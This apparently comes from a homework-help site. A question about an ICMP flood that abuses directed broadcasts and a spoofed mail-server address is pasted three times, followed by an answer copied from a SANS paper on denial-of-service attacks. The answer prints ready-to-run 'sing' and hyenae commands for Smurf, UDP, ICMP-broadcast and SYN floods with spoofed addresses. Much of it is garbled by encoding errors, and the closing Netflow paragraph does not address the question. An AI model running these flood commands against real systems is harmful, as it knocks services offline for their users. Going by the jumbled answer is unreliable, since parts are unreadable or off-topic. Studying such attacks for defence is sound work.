An attacker is able to get the IP address of the target organization’s mail serv

Question

An attacker is able to get the IP address of the target organization’s mail server. From information leakage and social engineering, the attacker finds out that the company has Wake-On-LAN (WOL) implemented to save power as part of their green initiative. This lets you know that IP directed broadcasts are enabled.
If the attacker plans to spoof his address as the mail server, explain why this information might be beneficial to an attacker that plans on carrying out an ICMP Flood style Denial of Service attack. An attacker is able to get the IP address of the target organization’s mail server. From information leakage and social engineering, the attacker finds out that the company has Wake-On-LAN (WOL) implemented to save power as part of their green initiative. This lets you know that IP directed broadcasts are enabled.
If the attacker plans to spoof his address as the mail server, explain why this information might be beneficial to an attacker that plans on carrying out an ICMP Flood style Denial of Service attack. An attacker is able to get the IP address of the target organization’s mail server. From information leakage and social engineering, the attacker finds out that the company has Wake-On-LAN (WOL) implemented to save power as part of their green initiative. This lets you know that IP directed broadcasts are enabled.
If the attacker plans to spoof his address as the mail server, explain why this information might be beneficial to an attacker that plans on carrying out an ICMP Flood style Denial of Service attack.

Explanation / Answer

Types of attacks There are several flavors of Denial of Service that could disrupt a normal service. The attacking methods are classified into two methods according to Erikson Jon [1]. x First type would be to flood the network not leaving enough bandwidth for the legitimate packets to get through. This could also be termed as Flooding. x The other method is to crash a hardware or software item and make it inoperable. Web servers, routing devices, DNS look up servers are the common targets that could be crashed during an attack. This project has investigated both the scenarios and has analyzed its effects. The DDoS paper published by Lee Garber talks about the mechanisms involved in some common attack types. Following are the most basic attacking methods employed so far [2]. ©2011SANSInstitute, Authorretainsfullrights. ©2011TheSANSInstitute AspartoftheInformationSecurityReadingRoom Authorretainsfullrights. 9 subramanirao@yahoo.com 3.1.1 Smurf attack: 7KLVDWWDFNZRUNVRQWKHPHFKDQLVPRIIORRGLQJWKHYLFWLP¶VEDQGZLGWK,QWKLVPHWKRG the attacker sends a large number of ICMP echo requests to a broadcast address. All the ICMP PHVVDJHVKDYHVSRRIHGVRXUFHDGGUHVVDVWKDWRIYLFWLP¶V,3DGGUHVV(YHQWXDOODOOWKHUHSO PHVVDJHVWDUJHWDQGIORRGWKHYLFWLP¶VDGGUHVV 3.1.2 Ping Flood and Ping of Death: Ping flood is similar to Smurf wherein the victim is bombarded with thousands of ping packets. In Ping of death, the victim is sent corrupt packets that could crash the system [3]. Smurf and ping floods are very easy to craft and any novice attacker could do it with ease. The following command in a Linux terminal could launch an attack [17]. Attacker# ./sing -echo -s 1024 -S ddos-1.example.com 192.168.81.255 Singing to 192.168.81.255 (192.168.81.255): 16 data bytes There are enough effective defense mechanisms against Smurf and Ping attacks on the internet lately. However, these attacks could cause considerable damage in small Local Area Networks. 3.1.3 T CP SYN flood: The above described methods works on consuming the bandwidth space whereas this attack aims at exploiting server CPU memory. Whenever a host attempts to connect to a server, a three way handshake protocol is established before any actual data transfer occurs. Firstly, the host sends a SYN packet to initiate the handshake. The server then replies with an Acknowledgement packet. At last the host again needs to send a SYN ACK packet to establish a successful connection. But attackers leave the handshake half open by not sending the last SYN $&.6XFKDKDOIRSHQVWDWHLVVWRUHGLQWKHVHUYHU¶VPHPory and the server keeps waiting for the host to send the final packet. When thousands of such half open connections are initiated, the server runs out of memory and crashes. It will not be able to serve the legitimate clients as its memory is dumped with forged fake packets [5]. 3.1.4 UDP flood: UDP flooding is similar to ping flood. Here instead of ping packets, UDP packets are bombarded against the server. UDP could be a lot more effective than ICMP in smaller networks as the size of the UDP packets are enormous. The packet size could be set up to 65000 bytes which could easily flood a given Ethernet network when multiple zombies are set up. This project has analyzed all the above described attacks and has brought down some interesting observations.

beneficial to an attacker Strategies

The attack from hyenae packet generator could be initiated from the Linux terminal. The following commands decide what kind of attack to be launched against the server. The characters and the keywords used for various attacks are first explained below. µ3¶ denotes that the packet size of 1000 bytes is to be generated by this command. The packet size can be adjusted according to the need but the highest size is chosen here to do the maximum damage. The symbols µ6DQG'¶ denote the source and destination addresses respectively. µ$¶denotes the IP version 4. The attacks can also be performed with IP version 6 by changing µ$¶WRµ$¶ The µSHUFHQWDJHVPERO¶ in the command is used to aim at random ports when attacking. The attack could be made even more specific by changing it to port 80 instead of %%. x This below command when entered on the terminal generates random UDP packets and targets DJDLQVWWKHVHUYHU¶V,3DGGUHVV:HDOVRQHHGWRSURYLGHWKHPDFDGGUHVV of the server in order to launch this attack. In the following commands UDP flood Æ hyenae -I 1 -a udp -p 1000 -A 4 -s 00:02:B3:94:9E:DF-192.168.2.2@%% -d 00:10:A7:0F :2F :04-192.168.1.2@%% x The following command is employed to launch of ICMP instead of UDP. It is exactly as same as the previous command but just differs with the destination address ICMP flooding Æ hyenae -I 1 -a icmp-echo -A 4 -s 00:02:B3:94:9E: DF -192.168.1.2 -d ff:ff:ff:ff:ff:ff-255.255.255.255 x This command invokes fake TCP connections and forces the server to hold all the half open SYN conQHFWLRQV7KHVHUYHU¶V&38PHPRUWULHVDQGKROGVDVPXFKFRQQHFWLRQDVSRVVLEOH but eventually crashes out of memory. SYN flooding Æ hyenae -I 1 -a tcp -f s -A 4 -s 00:02:B3:94:9E:DF-192.168.2.2@%% -d 00:10:A7:0F :2F :04-192.168.1.2@%% The following table shows the list of parameters specified here in the Hyenae tool for carrying out each attack. Attack Payload Size IP version Source Destination Port M A C address IP address M A C address IP address UDP 1000 IPV4 00:02:B3:94:9E:DF 192.168.2.2 00:10:A7:0F:2F:04 192.168.1.2 Random ICMP IPV4 00:02:B3:94:9E:DF 192.168.2.2 ff:ff:ff:ff:ff:ff 255.255.255.255 TCP IPV4 00:02:B3:94:9E:DF 192.168.2.2 00:10:A7:0F:2F:04 192.168.

Attack specifications used in the Hyenae packet generator , we can observe that nearly five thousand traffic pattern packets have been exported to the Netflow collector. This information is always exported as UDP packets for many convenience reasons. that a total of 779 UDP datagrams have been exported. But there is always a danger of losing UDP packets as they are connectionless and does not guarantee Quality of Service. Hence Cisco came with the idea of µIORZVHTXHQFH number¶ that is attached to the packets to make sure that they are not lost during network congestion.

Related Questions

Navigate

• Browse (All)
• Browse A
• Subjects

---

---

Integrity-first tutoring: explanations and feedback only — we do not complete graded work. Learn more.